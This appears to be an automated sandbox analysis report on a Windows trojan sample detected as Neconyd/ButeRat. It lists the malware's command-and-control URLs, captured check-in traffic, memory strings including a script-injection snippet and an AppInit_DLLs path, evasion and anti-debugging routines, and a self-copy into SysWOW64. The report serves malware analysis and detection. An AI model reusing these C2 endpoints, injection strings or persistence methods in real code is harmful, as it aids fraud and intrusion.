Edit tour

Windows Analysis Report
h.exe

Overview

General Information

Sample name:	h.exe
Analysis ID:	1379486
MD5:	564451e54fa0196acd2fd7f771e5ed1c
SHA1:	fd0a26fea635276bc7b54d572f2dbeb7bfd2e1fc
SHA256:	3e4a9ecdc59ebcf0941aa0c37a6704ddfe15eadcc3f16d1023132445736df30f
Infos:

Detection

Neconyd

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Neconyd

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found API chain indicative of debugger detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

h.exe (PID: 1468 cmdline: C:\Users\user\Desktop\h.exe MD5: 564451E54FA0196ACD2FD7F771E5ED1C)

omsecor.exe (PID: 1228 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 77F1965059059CE58EC10CCA09F566D1)

omsecor.exe (PID: 7740 cmdline: C:\Windows\System32\omsecor.exe MD5: 5A37340FA852E5184BBBA4134E60B591)

cleanup

Malware Configuration

Threatname: Neconyd

{"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: h.exe PID: 1468	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security
Process Memory Space: omsecor.exe PID: 1228	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security
Process Memory Space: omsecor.exe PID: 7740	JoeSecurity_Neconyd	Yara detected Neconyd	Joe Security

Snort Signatures

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.41.229.245 - Destination IP: 192.168.2.7

Timestamp:	34.41.229.245192.168.2.780497092037771 01/23/24-13:39:19.732410
SID:	2037771
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ransom.Win32.Birele.gsg Checkin - Source IP: 192.168.2.7 - Destination IP: 34.41.229.245

Timestamp:	192.168.2.734.41.229.24549709802015786 01/23/24-13:39:19.422200
SID:	2015786
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ransom.Win32.Birele.gsg Checkin - Source IP: 192.168.2.7 - Destination IP: 193.166.255.171

Timestamp:	192.168.2.7193.166.255.17149699802015786 01/23/24-13:38:35.744468
SID:	2015786
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ransom.Win32.Birele.gsg Checkin - Source IP: 192.168.2.7 - Destination IP: 64.225.91.73

Timestamp:	192.168.2.764.225.91.7349713802015786 01/23/24-13:40:05.584888
SID:	2015786
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ransom.Win32.Birele.gsg Checkin - Source IP: 192.168.2.7 - Destination IP: 64.225.91.73

Timestamp:	192.168.2.764.225.91.7349708802015786 01/23/24-13:39:18.638291
SID:	2015786
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Code function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,

0_2_00407036

Source: global traffic	HTTP traffic detected: GET /650/534.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /470/855.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /92/650.html HTTP/1.1From: 133504871133179231Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /569/916.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /580/608.html HTTP/1.1From: 133504915384329881Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0

Source: unknown

DNS traffic detected: queries for: lousta.net

Source: omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/0
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/242/343.html
Source: omsecor.exe, 00000002.00000002.1665837738.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/650/534.html
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/650/534.htmlr
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/7/91.html
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/7/91.htmla
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.html
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.html$
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.htmlH
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.htmlZ
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.html_-O
Source: omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.htmlhtml
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/763/735.htmlr-b
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/876/244.html
Source: omsecor.exe, 00000002.00000003.1646596868.000000000083E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/F.
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/470/855.html
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/569/916.html
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/569/916.html#
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/569/916.html9
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.html
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.html7
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.htmlE
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.htmlg
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.htmlk
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/580/608.htmlm
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/92/650.html
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/92/650.htmll;
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/92/650.htmlws
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/92/650.htmlx;
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/S
Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/T
Source: h.exe, omsecor.exe.0.dr, omsecor.exe.2.dr	String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/lousta.net
Source: omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://domaincntrol.com/?orighost=
Source: omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nojs.domaincntrol.com

E-Banking Fraud

Yara detected Neconyd

Source: Yara match	File source: Process Memory Space: h.exe PID: 1468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 1228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 7740, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\omsecor.exe

File created: C:\Windows\SysWOW64\omsecor.exe

Jump to behavior

Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_00401C41	0_2_00401C41
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040D2A4	0_2_0040D2A4
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040B51C	0_2_0040B51C
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040CBD0	0_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_00401C41	13_2_00401C41
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040D2A4	13_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040B51C	13_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040CBD0	13_2_0040CBD0

Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405511 appears 56 times
Source: C:\Users\user\Desktop\h.exe	Code function: String function: 00405511 appears 56 times

Source: h.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@5/2@3/3

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,

0_2_0040A057

Source: C:\Users\user\Desktop\h.exe

File created: C:\Users\user\AppData\Roaming\omsecor.exe

Jump to behavior

Source: h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\h.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: h.exe	ReversingLabs: Detection: 100%
Source: h.exe	Virustotal: Detection: 88%

Source: C:\Users\user\Desktop\h.exe

File read: C:\Users\user\Desktop\h.exe

Jump to behavior

Source: C:\Users\user\Desktop\h.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_0-5765
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess			graph_13-5766

Source: unknown	Process created: C:\Users\user\Desktop\h.exe C:\Users\user\Desktop\h.exe
Source: C:\Users\user\Desktop\h.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Users\user\Desktop\h.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\omsecor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004032B8

Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040D293 push ecx; ret	0_2_0040D2A3
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040CBB5 push ecx; ret	0_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040D293 push ecx; ret	13_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040CBB5 push ecx; ret	13_2_0040CBC8

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Roaming\omsecor.exe

Executable created and started: C:\Windows\SysWOW64\omsecor.exe

Jump to behavior

Source: C:\Users\user\Desktop\h.exe	File created: C:\Users\user\AppData\Roaming\omsecor.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\omsecor.exe

File created: C:\Windows\SysWOW64\omsecor.exe

Jump to dropped file

Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_0040350F
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_004039EA
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	13_2_0040350F
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	13_2_004039EA

Source: C:\Users\user\Desktop\h.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_0-5799
Source: C:\Users\user\Desktop\h.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_0-5799

Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_13-5734
Source: C:\Users\user\Desktop\h.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-5784
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_13-5861
Source: C:\Users\user\Desktop\h.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-5861

Source: C:\Users\user\Desktop\h.exe

API coverage: 8.6 %

Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 4052	Thread sleep time: -40000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 7744	Thread sleep time: -40000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040ABD9 FindFirstFileW,FindClose,	13_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	13_2_00408248

Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp5a%SystemRoot%\system32\mswsock.dllE
Source: omsecor.exe, 00000002.00000002.1665837738.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000085A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000003.1646596868.000000000085A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*

Source: C:\Users\user\Desktop\h.exe	API call chain: ExitProcess graph end node			graph_0-5889
Source: C:\Windows\SysWOW64\omsecor.exe	API call chain: ExitProcess graph end node			graph_13-5889

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\SysWOW64\omsecor.exe

Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep

graph_13-6402

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CD66

Source: C:\Users\user\Desktop\h.exe

0_2_004032B8

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,FindCloseChangeNotification,CloseHandle,

0_2_004075D4

Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	0_2_004032B8
Source: C:\Users\user\Desktop\h.exe	Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CD66
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	13_2_004032B8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 13_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040CD66

Source: h.exe, omsecor.exe	Binary or memory string: Shell_TrayWnd
Source: h.exe, omsecor.exe.0.dr, omsecor.exe.2.dr	Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_timeCsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: /*

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_0040CB03 cpuid

0_2_0040CB03

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,

0_2_00407267

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00407499

Source: C:\Users\user\Desktop\h.exe

Code function: 0_2_00406CB5 GetVersionExW,

0_2_00406CB5

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	2 Process Injection	121 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	21 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	12 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
h.exe	100%	ReversingLabs	Win32.Trojan.ButeRat
h.exe	89%	Virustotal		Browse
h.exe	100%	Avira	TR/Crypt.XPACK.Gen
h.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
